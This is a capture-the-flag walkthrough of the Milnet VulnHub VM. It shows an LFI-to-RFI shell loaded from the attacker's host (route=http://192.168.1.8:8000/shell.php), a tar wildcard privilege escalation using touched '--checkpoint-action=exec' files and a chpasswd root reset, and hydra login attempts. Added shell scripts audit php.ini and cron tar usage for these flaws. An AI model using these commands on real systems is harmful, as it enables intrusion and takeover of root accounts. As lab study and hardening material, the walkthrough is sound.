Hi Again,
Today I will show you how to pwn the Milnet VM from VulnHub.
Fire up the machine and run your port scans; only ports 22 and 80 are open.
Starting Nmap 6.40 ( http://nmap.org ) at 2016-10-29 17:08 EET
Nmap scan report for 192.168.1.12
Host is up (0.00019s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     (protocol 2.0)
|_ssh-hostkey: ERROR: Script execution failed (use -d to debug)
80/tcp open  http    lighttpd 1.4.35
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port22-TCP:V=6.40%I=7%D=10/29%Time=5814BB75%P=x86_64-pc-linux-gnu%r(NUL
SF:L,20,"SSH-2\.0-OpenSSH_7\.2p2\x20Ubuntu-4\r\n");
MAC Address: F4:06:69:8D:72:D7 (Unknown)
No exact OS matches for host (If you know what OS is running on it, see http://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=6.40%E=4%D=10/29%OT=22%CT=1%CU=36331%PV=Y%DS=1%DC=D%G=Y%M=F40669%
OS:TM=5814BB83%P=x86_64-pc-linux-gnu)SEQ(SP=107%GCD=1%ISR=10C%TI=Z%CI=I%TS=
OS:8)SEQ(SP=107%GCD=1%ISR=10C%TI=Z%II=I%TS=8)OPS(O1=M5B4ST11NW7%O2=M5B4ST11
OS:NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O5=M5B4ST11NW7%O6=M5B4ST11)WIN(W1=712
OS:0%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)ECN(R=Y%DF=Y%T=40%W=7210%O=M5B
OS:4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(
OS:R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F
OS:=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T
OS:=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RI
OS:D=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
Network Distance: 1 hop
TRACEROUTE
HOP RTT     ADDRESS
1   0.19 ms 192.168.1.12
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 32.47 seconds
I had a look at the web page on port 80.
I fired up Burp and found this:
there is a POST parameter called route.
I suspected an LFI vulnerability, and I was right: I used the php://filter trick to get the source code.
I got the source code of all the files but unfortunately didn't find any lead there. I also got the phpinfo output, and found that allow_url_include is On.
Great, with this configuration we can turn the LFI into an RFI. I set up a reverse shell served from my own machine and sent a POST request with the parameter route=http://192.168.1.8:8000/shell.php,
and I got myself a shell.
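The step that matters for a defender here is the configuration check: the route parameter was only an LFI until allow_url_include made include() accept URLs. Below is an added example (my own code, not part of the original post or the VM) that reads a php.ini, resolves the effective value of a directive the way PHP does (last assignment wins, comments ignored, On/1/true/yes all count as enabled), reports whether remote inclusion is possible, and emits the hardened file. The php.ini text is a constructed sample; the VM's real file is not on the page.

```bash
#!/bin/sh
# Added example (not from the original post): audit php.ini for the setting
# that turns a path-controlled include() into remote file inclusion.

# Constructed sample php.ini fragment; the VM's real php.ini is not on the page.
SAMPLE_PHP_INI='; constructed sample, not the real php.ini
[PHP]
allow_url_fopen = On
allow_url_include = On   ; this is what lets include() fetch remote code
expose_php = Off
'

# Print the effective (last) value of a directive, lowercased; empty if unset.
# $1: ini text, $2: directive name.
php_ini_value() {
  printf '%s\n' "$1" | awk -v key="$2" '
    /^[ \t]*[;#]/ { next }                # comment line
    index($0, "=") == 0 { next }          # section headers and blank lines
    {
      p = index($0, "=")
      k = substr($0, 1, p - 1); gsub(/^[ \t]+|[ \t]+$/, "", k)
      if (k == key) {
        v = substr($0, p + 1)
        sub(/[ \t]*;.*$/, "", v)          # drop trailing comment
        gsub(/^[ \t]+|[ \t]+$/, "", v)
        last = tolower(v)
      }
    }
    END { print last }'
}

# True if PHP would treat the directive as enabled.
# $1: ini text, $2: directive name.
ini_is_on() {
  case "$(php_ini_value "$1" "$2")" in
    on|1|true|yes) return 0 ;;
    *)             return 1 ;;
  esac
}

# Report whether a user-controlled include path can reach a remote URL.
# Returns 1 when it can, so it can be used as a check in scripts.
audit_url_include() {
  if ini_is_on "$1" allow_url_include; then
    echo "allow_url_include=On: include()/require() accept http:// paths, an LFI becomes an RFI"
    return 1
  fi
  echo "allow_url_include=Off: remote includes are rejected (local file inclusion is still possible)"
  return 0
}

# Hardened ini text: force the directive Off. PHP's default is Off, so a file
# that never mentions the directive needs no change.
harden_url_include() {
  printf '%s\n' "$1" | sed -E 's/^([[:space:]]*allow_url_include[[:space:]]*=).*/\1 Off/'
}

# Stand-alone run: show the verdict before and after hardening.
audit_url_include "$SAMPLE_PHP_INI" || true
audit_url_include "$(harden_url_include "$SAMPLE_PHP_INI")"
```

Turning allow_url_include off removes the remote include, but the route parameter is still a local file inclusion; the application-side fix is to map route values to an allowlist of files rather than passing them to include().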
Looking for a (quick) escalation point: my shell was in the / directory, and running ls I found a folder called backup.
Inside this backup folder I found a backup.sh file owned by root which contains a wildcard misconfiguration. Of course I can't run this file with my privileges, but I searched for someone or something that calls this script.
So I looked for backup.sh inside all files on the Linux system:
grep -r "backup.sh" > /tmp/result
below is the output
$ cat /tmp/result
var/lib/apt/lists/us.archive.ubuntu.com_ubuntu_dists_xenial_universe_i18n_Translation-en: This package provides the backup, restore, backup.sh, and dump-remind
home/langman/SDINET/fips_500_166.txt:system data. Each backup should be checked to ensure that the
etc/crontab:*/1 * * * * root /backup/backup.sh
usr/sbin/deluser: # if --backup-to is specified, --backup should be set too
$
I can see that the file is called from cron every minute. Great, easy shell now.
The content of the backup file is:
#!/bin/bash
cd /var/www/html
tar cf /backup/backup.tgz *
The wildcard misconfiguration lets us escalate our privileges, because tar has options that can be used to run Linux commands, and the unquoted * passes every filename in the directory to tar as an argument.
I created a file called myshell.sh
with these contents:
echo "root:password1" | chpasswd
This changes the root password.
Next I created the tar options used for the injection as empty files in the /var/www/html directory (the -- is needed so touch does not parse the names as its own options):
touch -- '--checkpoint-action=exec=sh myshell.sh'
touch -- --checkpoint=1
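Two things made this escalation possible: a root cron job running a script that anyone can read, and a tar invocation whose file list is built by shell globbing. The example below is added by me and is not part of the original post or the VM. It pulls root-run commands out of a system crontab, flags tar lines with an unquoted wildcard, and shows the hardened form of the backup script next to the original one; the demo creates constructed hostile filenames in a scratch directory and confirms the hardened form stores them as plain archive entries. The crontab and script contents used in the demo are constructed samples.

```bash
#!/bin/sh
# Added example (not from the original post): audit the two conditions the
# walkthrough relies on and show the hardened backup script.

# Print the commands a system crontab runs as root.
# $1: path to a crontab-format file (min hour dom mon dow user command).
root_cron_commands() {
  awk '!/^[ \t]*(#|$)/ && !/^[A-Za-z_]+=/ && $6 == "root" {
         cmd = $7
         for (i = 8; i <= NF; i++) cmd = cmd " " $i
         print cmd
       }' "$1"
}

# Flag tar invocations whose file list is an unquoted shell glob.
# $1: path to a shell script. Prints offending lines; returns 1 if any.
audit_tar_wildcards() {
  awk '/(^|[;&| \t])tar[ \t]/ && /(^|[ \t])[*?]([ \t]|$)/ {
         print FILENAME ":" NR ": unquoted wildcard passed to tar: " $0
         hit = 1
       }
       END { exit hit }' "$1"
}

# The backup script as found on the VM: the shell expands * into filenames,
# and any filename beginning with "-" is parsed by tar as an option.
backup_unsafe() {   # $1: directory to archive, $2: archive path
  cd "$1" && tar cf "$2" *
}

# Hardened form: -C makes tar change directory itself and "." names the
# contents, so no filename ever appears on tar's command line.
backup_safe() {     # $1: directory to archive, $2: archive path
  tar -cf "$2" -C "$1" .
}

# Demonstration with constructed hostile filenames in a scratch directory.
demo() {
  scratch=$(mktemp -d)
  mkdir "$scratch/html"
  echo hello > "$scratch/html/index.html"
  : > "$scratch/html/--checkpoint=1"
  : > "$scratch/html/--checkpoint-action=exec=touch marker"
  backup_safe "$scratch/html" "$scratch/backup.tgz"
  if [ -e "$scratch/html/marker" ]; then
    echo "checkpoint action ran"
  else
    echo "hardened backup stored the option-like names as plain entries:"
    tar -tf "$scratch/backup.tgz"
  fi
  rm -rf "$scratch"
}

demo
```

The audit is a heuristic (it looks for a bare * or ? token on a line that invokes tar), so treat a hit as something to read, not a verdict. Beyond the script fix, the other mitigation is not letting the web server's user write into a directory a root job consumes, and keeping root-run scripts unreadable to unprivileged accounts.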
Next I ran hydra in a for loop against the machine until the password was changed:
sakr@HacKeD ~/study/Milnet $ for i in {1..200}; do hydra -l root -p password1 192.168.1.12 ssh; done
Hydra v7.5 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2016-10-29 21:52:50
[DATA] 1 task, 1 server, 1 login try (l:1/p:1), ~1 try per task
[DATA] attacking service ssh on port 22
[22][ssh] host: 192.168.1.12   login: root   password: password1
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2016-10-29 21:52:51
Hydra v7.5 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2016-10-29 21:52:51
[DATA] 1 task, 1 server, 1 login try (l:1/p:1), ~1 try per task
[DATA] attacking service ssh on port 22
[22][ssh] host: 192.168.1.12   login: root   password: password1
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2016-10-29 21:52:51
Hydra v7.5 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2016-10-29 21:52:51
[DATA] 1 task, 1 server, 1 login try (l:1/p:1), ~1 try per task
[DATA] attacking service ssh on port 22
[22][ssh] host: 192.168.1.12   login: root   password: password1
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2016-10-29 21:52:51
Hydra v7.5 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2016-10-29 21:52:51
[DATA] 1 task, 1 server, 1 login try (l:1/p:1), ~1 try per task
[DATA] attacking service ssh on port 22
[22][ssh] host: 192.168.1.12   login: root   password: password1
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2016-10-29 21:52:52
Hydra v7.5 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2016-10-29 21:52:52
[DATA] 1 task, 1 server, 1 login try (l:1/p:1), ~1 try per task
[DATA] attacking service ssh on port 22
[22][ssh] host: 192.168.1.12   login: root   password: password1
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2016-10-29 21:52:52
That was a fairly easy VM. Hope you enjoyed it.